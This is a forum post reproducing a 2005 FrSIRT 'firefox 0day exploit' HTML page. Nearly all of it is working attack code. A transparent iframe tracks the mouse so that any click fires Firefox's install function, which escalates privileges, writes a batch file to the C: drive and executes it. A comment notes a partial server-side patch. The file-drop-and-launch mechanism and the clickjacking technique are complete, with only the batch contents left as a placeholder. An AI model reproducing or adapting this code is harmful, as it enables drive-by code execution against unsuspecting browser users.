From FrSIRT.Code:------------------------------------- exploit.htm ------------------------------------- // FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched) // If a user clicks anywhere on a specially crafted page, this code will // automatically create and execute a malicious batch/exe file. // // Update (08.05.2005) - The Mozilla Foundation patched (partially) this // issue on the server side by adding random letters and numbers to the // install function, which will prevent this exploit from working. <html><head><title>firefox 0day exploit</title> <body>Click anywhere inside this page<br> <br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br> <iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\') {window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/ mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\' UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\']. createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\ booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420); outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\']. createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08 |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here... \\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch(); \\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php? id=220&application=firefox\' style=\'cursor:default;\'></'+'a>'" id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style= "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; -moz-opacity:0"></iframe> <script language="JavaScript" type="text/javascript"> document.onmousemove = function trackMouse(e) { document.getElementById("targetframe").style.left = (e.pageX-3)+"px" document.getElementById("targetframe").style.top = (e.pageY-3)+"px" } var counter = 0; function loader() { counter++ if(counter == 1) { stealcookies.focus() } else if(counter == 2) { stealcookies.history.go(-1) //targetframe.style.display="none"; } } </script> </body> </html>
Reply With Quote